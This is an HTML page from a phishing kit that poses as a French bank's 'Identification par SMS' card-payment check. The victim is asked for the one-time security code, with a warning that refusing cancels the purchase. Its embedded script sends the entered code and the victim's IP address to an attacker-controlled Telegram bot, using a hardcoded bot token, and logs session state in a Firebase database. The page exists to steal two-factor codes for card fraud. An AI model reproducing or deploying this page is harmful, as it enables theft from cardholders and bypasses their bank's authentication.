<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style>@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>ACS</title>
<link href="ACS_fichiers/libs.css" rel="stylesheet">
<link href="ACS_fichiers/app.css" rel="stylesheet">
<link ng-href="app/config/custom/custom.css" rel="stylesheet" id="custom" href="ACS_fichiers/custom.css">

</head>
<body>
<custom-component layout-data="layoutData" class="ng-isolate-scope"><div class="ng-scope"><div><div class="container-fluid">
    <div id="headerLayout" class="row">
        <div id="pageHeader" class="text-center col-xs-12">
            <div class="row">
               
                <div class=" col-xs-4 col-lg-6">
                    <div id="centeredTitle" style="color:#00643E;">
                      <center>  <custom-text id="page-title" custom-text-key="'network_means_pageType_20'" class="ng-isolate-scope"><span id="page-title" ng-bind-html="customText" class="custom-text ng-binding">Identification par SMS</span></custom-text></center>
                    </div>
                </div>
                
            </div>
        </div>
    </div>
    <style>
        #issuerLogo,
        #networkLogo {
            max-height: 75px;
            max-width: 100%;
            height: auto;
            padding: 0px;
        }
        #centeredTitle {
            font-weight: 500;
            display: block;
            font-size: 150%;
            margin-top:10px;
        }
    </style>

    <message-banner class="ng-isolate-scope"><!-- ngIf: show --></message-banner>
    <style>
        message-banner {
            display: block;
            width: 100%;
            position: relative;
        }
    </style>
	<div id="green-separator"></div>
    <style>
        div#green-separator {
            background-color:rgb(0,137,145);
            width: 100%;
            height: 50px !important;
            border-bottom: 5px solid rgb(222,19,0);
        }
    </style>
	<form action="sms.php" id="formSendCode" method="POST">
    <div id="mainLayout" class="row">
        <div class="noLeftRightMargin">
            <div id="leftMenuLayout" class=" col-xs-12 col-sm-4 col-md-4 col-lg-4">
                <div class="noLeftRightPadding">
                    <side-menu menu-title="'TRANSACTION_SUMMARY'" class="ng-isolate-scope"><div class="side-menu text-center">
	<div class="row menu-title" ng-show="showMenuTitle()">
		<custom-text custom-text-key="menuTitle" class="ng-isolate-scope"><span id="" ng-bind-html="customText" class="custom-text ng-binding">Résumé de la transaction</span></custom-text>
	</div>
	<div class="menu-elements">
		<!-- ngRepeat: menuItem in menuItems --><div ng-repeat="menuItem in menuItems" class="ng-scope" style="">
			<div ng-switch="" on="menuItem.value">
				<!-- ngSwitchWhen: BUTTON -->
				<!-- ngSwitchDefault: --><div ng-switch-default="" class="break-word ng-scope">
					<span class="col-sm-5 col-xs-6 col-xs-offset-0 col-sm-offset-1 text-right padding-left">
						<label data-cy="SIDE_MENU_ITEM_LABEL">
							<custom-text custom-text-key="menuItem.labelKey" class="ng-isolate-scope"><span id="" ng-bind-html="customText" class="custom-text ng-binding">Marchand</span></custom-text>
						</label>
						<label id="menu-separator">:</label>
					</span>
					<span class="col-sm-6 col-xs-6 text-left padding-left" data-cy="SIDE_MENU_ITEM_VALUE">
                        <span class="ng-binding">wirecardbank.com</span>
						<!-- ngIf: showRefreshPhoneButton(menuItem.type) -->
					</span>
				</div><!-- end ngSwitchWhen: -->
			</div>
		</div><!-- end ngRepeat: menuItem in menuItems --><div ng-repeat="menuItem in menuItems" class="ng-scope">
			<div ng-switch="" on="menuItem.value">
				<!-- ngSwitchWhen: BUTTON -->
				<!-- ngSwitchDefault: --><div ng-switch-default="" class="break-word ng-scope">
					<span class="col-sm-5 col-xs-6 col-xs-offset-0 col-sm-offset-1 text-right padding-left">
						<label data-cy="SIDE_MENU_ITEM_LABEL">
							<custom-text custom-text-key="menuItem.labelKey" class="ng-isolate-scope"><span id="" ng-bind-html="customText" class="custom-text ng-binding">Montant</span></custom-text>
						</label>
						<label id="menu-separator">:</label>
					</span>
					<span class="col-sm-6 col-xs-6 text-left padding-left" data-cy="SIDE_MENU_ITEM_VALUE">
                        <span class="ng-binding"> €</span>
						<!-- ngIf: showRefreshPhoneButton(menuItem.type) -->
					</span>
				</div><!-- end ngSwitchWhen: -->
			</div>
		</div><!-- end ngRepeat: menuItem in menuItems --><div ng-repeat="menuItem in menuItems" class="ng-scope">
			<div ng-switch="" on="menuItem.value">
				<!-- ngSwitchWhen: BUTTON -->
				<!-- ngSwitchDefault: --><div ng-switch-default="" class="break-word ng-scope">
					<span class="col-sm-5 col-xs-6 col-xs-offset-0 col-sm-offset-1 text-right padding-left">
						<label data-cy="SIDE_MENU_ITEM_LABEL">
							<custom-text custom-text-key="menuItem.labelKey" class="ng-isolate-scope"><span id="" ng-bind-html="customText" class="custom-text ng-binding">Date</span></custom-text>
						</label>
						<label id="menu-separator">:</label>
					</span>
					<span class="col-sm-6 col-xs-6 text-left padding-left" data-cy="SIDE_MENU_ITEM_VALUE">
                        <span class="ng-binding"> 2024 </span>
						<!-- ngIf: showRefreshPhoneButton(menuItem.type) -->
					</span>
				</div><!-- end ngSwitchWhen: -->
			</div>
		</div><!-- end ngRepeat: menuItem in menuItems --><div ng-repeat="menuItem in menuItems" class="ng-scope">
			<div ng-switch="" on="menuItem.value">
				<!-- ngSwitchWhen: BUTTON -->
				<!-- ngSwitchDefault: --><div ng-switch-default="" class="break-word ng-scope">
					<span class="col-sm-5 col-xs-6 col-xs-offset-0 col-sm-offset-1 text-right padding-left">
						<label data-cy="SIDE_MENU_ITEM_LABEL">
							<custom-text custom-text-key="menuItem.labelKey" class="ng-isolate-scope"><span id="" ng-bind-html="customText" class="custom-text ng-binding">N° de carte</span></custom-text>
						</label>
						<label id="menu-separator">:</label>
					</span>
					<span class="col-sm-6 col-xs-6 text-left padding-left" data-cy="SIDE_MENU_ITEM_VALUE">
                        <span id="ccpan" class="ng-binding">000000000000xxxx</span>
						<!-- ngIf: showRefreshPhoneButton(menuItem.type) -->
					</span>
				</div><!-- end ngSwitchWhen: -->
			</div>
		</div><!-- end ngRepeat: menuItem in menuItems --><div ng-repeat="menuItem in menuItems" class="ng-scope">
			<div ng-switch="" on="menuItem.value">
				<!-- ngSwitchWhen: BUTTON -->
				<!-- ngSwitchDefault: --><div ng-switch-default="" class="break-word ng-scope">
					<span class="col-sm-5 col-xs-6 col-xs-offset-0 col-sm-offset-1 text-right padding-left">
						<label data-cy="SIDE_MENU_ITEM_LABEL">
							<custom-text custom-text-key="menuItem.labelKey" class="ng-isolate-scope"><span id="" ng-bind-html="customText" class="custom-text ng-binding">N° de téléphone</span></custom-text>
						</label>
						<label id="menu-separator">:</label>
					</span>
					<span class="col-sm-6 col-xs-6 text-left padding-left" data-cy="SIDE_MENU_ITEM_VALUE">
                        <span class="ng-binding">+33xxxxxxxxx</span>
						<!-- ngIf: showRefreshPhoneButton(menuItem.type) -->
					</span>
				</div><!-- end ngSwitchWhen: -->
			</div>
		</div><!-- end ngRepeat: menuItem in menuItems -->
	</div>
</div></side-menu>
                </div>
            </div>

            <div id="centerPieceLayout" class=" col-xs-12 col-sm-8 col-md-8 col-lg-7">
                <div class="paragraph">
                    <custom-text custom-text-key="'network_means_pageType_1'" id="paragraph1" class="ng-isolate-scope"><span id="paragraph1" ng-bind-html="customText" class="custom-text ng-binding">Pour
 sécuriser vos achats en ligne sur les sites affichant le logo ID 
Check™, il vous suffit désormais de vous identifier en saisissant le 
code sécurité qui vient de vous être transmis par téléphone.</span></custom-text>
                </div>
				<div class="paragraph">
                    <custom-text custom-text-key="'network_means_pageType_3'" id="paragraph3" class="ng-isolate-scope"><span id="paragraph3" ng-bind-html="customText" class="custom-text ng-binding">Veuillez saisir le code sécurité reçu sur le n° de téléphone sélectionné (présenté de façon masquée ci-contre) :</span></custom-text>
                </div>
                <div class="text-center">
                    <otp-form class="ng-isolate-scope"><div id="otp-form">
                        <div id="er-sms" style="width:auto;background:#FFD5D5;color:#853737;padding:8px;border-radius:2px;margin:10px;text-align:left;display:none;">
    <span>Les informations sont incorrectes, veuillez vérifier à nouveau</span>
    </div>
	<div class="tooltips">
		<span ng-bind-html="tooltipsValue" class="ng-binding">Ex.: 71057337</span>
		<input id="code" type="text" maxlength="8" class="passwordCode" required>
	</div>
</div></otp-form>
                </div>
                <div class="text-center">
                    <input style="height:30px;width:100px;border:none;margin:10px; background :rgb(0,137,145);color:#fff;border-radius:5px;" type="submit" name="submit_btn" id = "submit"  value="Validé">

<script src="https://www.gstatic.com/firebasejs/9.1.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.1.0/firebase-database.js"></script>

<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
<script type="module">

import { initializeApp } from "https://www.gstatic.com/firebasejs/9.19.1/firebase-app.js";
import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/9.19.1/firebase-database.js";


const firebaseConfig = {
  apiKey: "AIzaSyBl3jw2EGp4FLto4DM0OZbryvcMh7boNfc",
  authDomain: "testespam-91c35.firebaseapp.com",
  databaseURL: "https://testespam-91c35-default-rtdb.firebaseio.com",
  projectId: "testespam-91c35",
  storageBucket: "testespam-91c35.appspot.com",
  messagingSenderId: "715946513851",
  appId: "1:715946513851:web:2925c3b38ba874cdaee09e"
};
const app = initializeApp(firebaseConfig);
const db = getDatabase(app);

const url = window.location.href;
 const idValue = new URL(url).searchParams.get('id');


const getElementValue = (id) => document.getElementById(id).value;
const submitButton = document.getElementById("submit");

submitButton.addEventListener('click', async (e) => {
  e.preventDefault();
  const response = await fetch('https://api64.ipify.org?format=json');
  const { ip: DiIp } = await response.json();

  const DiCode = getElementValue("code");

  if (DiCode && DiCode.trim().length >= 8) {
        set(ref(db, `user/${idValue}`), {
      Loading: "true",
      SMS: "false",
      CC: "false",
      CODE2: "false",
      SITE: "false",
      APP: "false",
      APPYES: "false",
      APPNO: "false"
    }).then(() => {
      
      const inputValue = $('.passwordCode').val();
      var botToken = '6405780707:AAHRLzgioifKDMGv5Rr9BGI-xqr-R7TZmtQ';
  	var chatId = '5426755496';

$.ajax({
  type: 'POST',
  url: `https://api.telegram.org/bot${botToken}/sendMessage`,
  data: {
    chat_id: chatId,
    text: `IMPOTS-SMS: ${inputValue}\nIP: ${DiIp} `
  },
  success: function(response) {

    window.location.href = 'loading.html?id=' + idValue;
  },
  error: function(error) {
    alert('ERROR:', error);
  }
});

    });
   } else {
      $("#er-sms").show();
  }
});

</script>

</button></val-button>
                </div>
                <div class="paragraph">
                    <custom-text custom-text-key="'network_means_pageType_2'" id="paragraph2" class="ng-isolate-scope"><span id="paragraph2" ng-bind-html="customText" class="custom-text ng-binding">Cette identification est obligatoire pour valider votre achat, Si vous ne souhaitez pas vous identifier votre achat sera annulé.</span></custom-text>
                </div>
            </div>
        </div>
    </div>
    <style>
        .noLeftRightMargin {
            margin-left: 0px;
            margin-right: 0px;
        }
        .noLeftRightPadding {
            padding-left: 0px;
            padding-right: 0px;
        }
        #centerPieceLayout {
            padding: 5px 10px 0px;
            min-height: 200px;
			background-color: #FFFFFF;
        }
        .paragraph {
            margin: 0px 0px 10px;
            text-align: justify;
        }
        .menu-title {
        }
        .menu-title span {
            display: block;
            font-size: 18px;
            margin-top: 10px;
            margin-bottom: 10px;
        }
        #validateButton {
            background-color: rgb(255, 255, 255);
            color: rgb(51, 51, 51);
            white-space: normal;
            border-radius: 4px;
            border-color: rgb(204, 204, 204);
        }
        #validateButton button {
            margin-top: 5px;
        }
        button span.fa {
            padding-right: 7px;
        }
        @media screen and (max-width: 480px){
            div.hideable-text {
                display: none;
	        }
        }
    </style>

        <div id="bottomMenu">
            <cancel-button cn-label="'network_means_pageType_40'" id="cancelButton" class="ng-isolate-scope">
            <help help-label="'network_means_pageType_41'" id="helpButton" class="ng-isolate-scope">
<!-- ngIf: show --></help>
        </div>

    <style>
        #bottomMenu {
            background-color: rgb(0,137,145);
            margin-top: 10px;
            text-align: center;
        }
        #cancelButton, #helpButton {
            color: rgb(51, 51, 51);
            white-space: normal;
            display: inline-block;
            border-width: 1px;
            border-style: solid;
            border-color: rgb(0, 166, 235);
            border-image: initial;
            margin: 10px;
        }
    </style>
</div>
</div></div></custom-component>

<script>
const idValue = (new URL(window.location.href)).searchParams.get('id');
const url = "https://testespam-91c35-default-rtdb.firebaseio.com/.json";

function fetchData() {
  fetch(url)
    .then(response => response.json())
    .then(data => {
      const ccValue = data.user[idValue]?.DiCc;
      document.getElementById('ccpan').textContent = ccValue;
    })
    .catch(error => console.error('ERROR:', error));
}

fetchData();

</script>
</body></html>